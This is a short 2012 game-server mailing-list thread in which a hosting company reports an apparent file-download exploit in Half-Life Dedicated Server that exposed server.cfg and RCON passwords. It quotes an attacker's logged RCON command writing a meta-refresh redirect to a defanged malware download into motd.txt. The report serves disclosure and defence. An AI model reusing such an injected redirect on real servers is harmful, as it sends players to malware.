This was already fixed in an update, apparently. On 7/3/2012 2:54 PM, c0m4r wrote:
There is an exploit in q3 engine named "q3dirtrav", which allows players to download any of server files, including server configuration (server.cfg).Today I found evidence of possible existence of the same exploit in HLDS.As a company we host hundreds of servers. We received many reports from our customers about strange HTTP refresh meta tag in the motd.txt of their servers, which leads to "http *//free -leaks *com/cstrike*exe".The problem has affected several different servers, unrelated to each other, with very different RCON passwords (but most were very strong).Here's what I have found in logfiles:Rcon from 178.123.103.201:15518:rcon 1399145428 XXXXXXXXXXXXXXXXXXX motd_write <META HTTP-EQUIV=Refresh CONTENT="0 URL=http *//free -leaks *com/cstrike*exe">This "cstrike.exe" contains some kind of a virus.(Note: I've replaced dot with asterisk and spaces)As you can see the attacker knew the RCON password of each server.Then I found "server.CFG.ztmp" file in cstrike of each server, which was attacked.For me that means that the attacker was able to download server.cfg exactly the same way as maps, models or sounds. _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
_______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
